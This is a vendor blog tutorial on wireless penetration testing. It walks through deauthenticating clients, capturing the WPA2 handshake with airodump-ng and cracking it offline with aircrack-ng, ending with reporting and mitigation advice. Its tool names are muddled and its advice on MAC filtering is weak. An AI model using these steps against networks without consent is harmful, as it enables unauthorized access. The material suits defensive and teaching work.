How To Perform A Wireless Penetration Test

Contents

Wireless penetration testing is comprised of six main steps including:

  1. Reconnaissance
  2. Identifying wireless networks
  3. Vulnerability research
  4. Exploitation
  5. Reporting
  6. Remediation

These tests are performed primarily to maintain secure software code development throughout its lifecycle.

Coding mistakes, specific requirements, or lack of knowledge in cyber attack vectors are the main purpose of performing this type of penetration test.

Sample Network Pen Test Report

What should a penetration test report include? Download our sample report to learn.

The term WiFi refers to wireless network technology that uses radio waves to establish wireless network connections.

Due to the nature of WiFi and its methods for providing network access, malicious hackers often choose to penetrate a company by compromising its WiFi network and corresponding infrastructure devices.

Homes are also at risk, especially due to the rise of IoT connected devices and appliances.

In this article, we will focus our efforts on WiFi penetration testing steps, methods and most popular tools used in the WiFi penetration testing process.

What Is A Wireless Penetration Test?

Wireless penetration testing involves identifying and examining the connections between all devices connected to the business’s WiFi.

These devices include laptops, tablets, smartphones, and any other internet of things (IoT) devices.

Wireless penetration tests are typically performed on the client’s site as the pen tester needs to be in range of the wireless signal to access it.

What Are The Goals Of A Wireless Pen Test?

Every official penetration test should primarily focus on the vulnerabilities most easily exploited.

This is often referred to as going for the “low-hanging fruit” as these identified vulnerabilities represent the highest risk and are most easily exploitable.

In the case of WiFi networks, these vulnerabilities are most often found in WiFI access points.

A common reason for this is due to insufficient Network Access Controls and due to the lack of MAC filtering.

If these security controls are not used to effectively increase the security of a WiFi network, malicious hackers gain a significant advantage over the company and can use various techniques and WiFi hacking tools to gain unauthorized access in the network.

Steps To Performing A Wireless Penetration Test

As previously stated, we will focus on the methodology and steps for testing the WiFi network and give examples of certain attacks and tools that will accomplish our goal.

wireless penetration steps

Below is a list of steps that can be sorted in 6 different areas of the penetration test.

wireless reconnaissance

Step: 1 Wireless Reconnaissance

Before jumping straight into hacking, the first step in every penetration testing process is the information gathering phase.

Due to the nature of WiFi, the information you gather is going to occur via War Driving. This is an information gathering method that includes driving around a premise to sniff out WiFi signals.

To do this you will require the following equipment:

  • A car or any other transportation vehicle.
  • A laptop and a WiFi antenna.
  • Wireless network adapter.
  • Packet capture and analysis software.

Most of the information you gather here will be useful but encrypted as most if not all companies use the latest WiFi protocol: WPA2.

This WiFi protocol protects the access point by utilizing encryption and uses EAPOL authentication.

Free Penetration Testing Policy

Skip the policy-writing hassle with our ready-to-use penetration testing policy template.

IT Security Policy Templates

Step 2: Identify Wireless Networks

The next step in WiFi penetration testing is scanning or identifying wireless networks.

Prior to this phase, you must set your wireless card in “monitor” mode in order to enable packet capture and specify your wlan interface.

specify your wlan interface

After your wireless card starts listening to wireless traffic, you can start the scanning process with airodump in order to scan traffic on different channels.

scanning process with airodump

An important step in decreasing your workload during the scanning process is to force the airodump to capture traffic only on a specific channel.

capture traffic only on a specific channel

Step 3: Vulnerability Research

After finding wifi access points through scanning, the next phase of the test will focus on identifying vulnerabilities in that access point.

The most common vulnerability is in the 4-way handshake process where an encrypted key is exchanged via between the WiFi access point and the authenticating client.

When a user tries to authenticate to a WiFi access point, a pre-shared key is generated and transmitted.

During the key transmission, a malicious hacker can sniff out the key and brute force it offline to try and extract the password.

To clarify this most commonly exploited vulnerability, the next section of the article will focus on the pre-shared key sniffing attack and tools used to accomplish the task.

Step 4: Exploitation

We will use the Airplay NG suite tool to accomplish our exploitation efforts by:

  • De-authenticating a legitimate client.
  • Capturing the initial 4-way handshake when the legitimate client reconnects.
  • Running an offline dictionary attack to crack the captured key.

Since we already started capturing the traffic on a specific channel, we will now proceed with the next step.

De-authenticating A Legitimate Client

Since we want to capture the 4-way handshake that occurs when every client authenticates to an access point, we must try and de-authenticate a legitimate client that is already connected.

De-authenticating a Legitimate Client

By doing this, we are effectively disconnecting the legitimate client from the access point and waiting for our previous Airodump -ng commands that we ran, to sniff out the 4-way handshake once the legitimate client starts reconnecting automatically.

Capturing The Initial Handshake

During the process of capturing traffic after the “de-auth” packets you’ve sent, you will be able to see lots of live information regarding the “de-auth” attack running.

Capturing the Initial Handshake

We can see the channel number, time elapsed, BSSID (MAC address), number of beacons and a lot more information.

The time it takes to successfully perform this depends on the distance between the hacker, the access point and the client we are trying to disconnect.

Once the 4-way handshake has been captured, you can save the capture to a “.cap” file.

By saving all of this captured traffic into a “.cap” file, we can quickly input the file in Wireshark – a popular network protocol analyzer tool to confirm that we have indeed captured all 4 stages of the handshake.

Wireshark - network protocol analyzer tool

Since we have now confirmed the 4-way handshake packet capture, we can go ahead and stop the packet capturing by typing the following airodump command: “Airmon-ng stop wlan0mon”.

Dictionary Attack On The Captured Key

Our final step in the exploitation phase is to crack the captured 4-way handshake key and extract the password.

To do this, we do not even have to use additional password-cracking tools such as JohntheRipper or Hydra.

We can simply use the Aircrack-ng module of the aireplay-ng suite.

Aircrack-ng module of the aireplay-ng suite

Additionally, you must identify the dictionary you want to use for cracking the key by specifying the file path after the “dump-01.cap” part of the above command.

This command will run the cracking process on the target MAC address of the access point utilizing the captured traffic in the .cap file and a specified dictionary.

Dictionary Attack on the Captured Key

As a result, we successfully found the password phrase “community.

Other Wireless Attacks

Since capturing keys from the 4-way handshake and brute forcing it offline is one of the most effective ways to gain unauthorized access, we emphasized this one practical attack.

Other practical attacks on wireless networks include the deployment of a rogue access point within the company.

This attack leverages the use of an unauthorized WiFi access point deployed inside the company buildings.

The main idea is to overpower the signals of a legitimate access point in the company’s network (or use WiFi signal jammers to render the authorized access point inaccessible) and force the employees to connect to the unauthorized access point.

If this runs successfully, an attacker will have control over all the traffic that is passing through that access point.

Step 5: Reporting

Structuring all of your steps, methods, and findings into a comprehensive document is the most important step in the work of a penetration tester.

It is highly suggested to document every step of your work, including every detailed finding, so you can have all the necessary details to make your report complete.

Make sure to include an executive summary, detailed technical risks, vulnerabilities you found along with the complete process of how you found them, exploits that were successful, and recommendations for mitigation.

$35/MO PER DEVICE

Enterprise Security Built For Small Business

Defy your attackers with Defiance XDR™, a fully managed security solution delivered in one affordable subscription plan.

Step 6: Remediation And Security Controls

We’ve demonstrated one practical exploit regarding Wireless networks that involves capturing WiFi traffic and the pre-shared key.

The attack was successful for many reasons including the lack of MAC filtering controls.

With this control turned on, the malicious hacker wouldn’t have been able to authenticate himself with the same password the legitimate user did.

Since anything can be hacked, the attacker would have to spoof his MAC address which is on the MAC list of approved addresses in order to successfully break into the wireless network.

Having Network Access Control (NAC) solutions in place will mitigate the possibility of having rouge access points in your network.

Additionally, the company may consider deploying wireless honeypots – simulated wireless networks that are used for detecting intrusions and analyzing the behavior of malicious hackers.

Conclusion

Wireless networks need just as much security consideration when being deployed and configured to keep them secure.

Wireless penetration testing is therefore a popular way to determine the realistic security posture of your wireless networks.

Even though it requires a bit more hardware equipment than your usual penetration test, wireless penetration testing is still performed with software tools often present in the Kali Linux OS with the industry’s most infamous tool for it being Airplay -NG.

We demonstrated a practical way of utilizing Airplay -NG and the results it can give with its powerful set of sub-tools.

All that is left for you to do now is try it out on your own (make sure you have consent for whatever and however small of a test you plan to do) and mitigate those vulnerabilities!

Article by

Picture of Strahinja Stankovic, ECSA
Strahinja Stankovic, ECSA
Strahinja is a Senior Information Security Analyst with 7 years of professional experience in cyber security. His primary focus is on security event monitoring, analysis and incident response.

Related Content

Picture of Strahinja Stankovic, ECSA
Strahinja Stankovic, ECSA
Strahinja is a Senior Information Security Analyst with 7 years of professional experience in cyber security. His primary focus is on security event monitoring, analysis and incident response.

Share This Article

Our Editorial Process

Our content goes through a rigorous approval process which is reviewed by cybersecurity experts – ensuring the quality and accuracy of information published.

Categories

.

The Breach Report

Our team of security researchers analyze recent cyber attacks, explain the impact, and provide actionable steps to keep you ahead of the trends.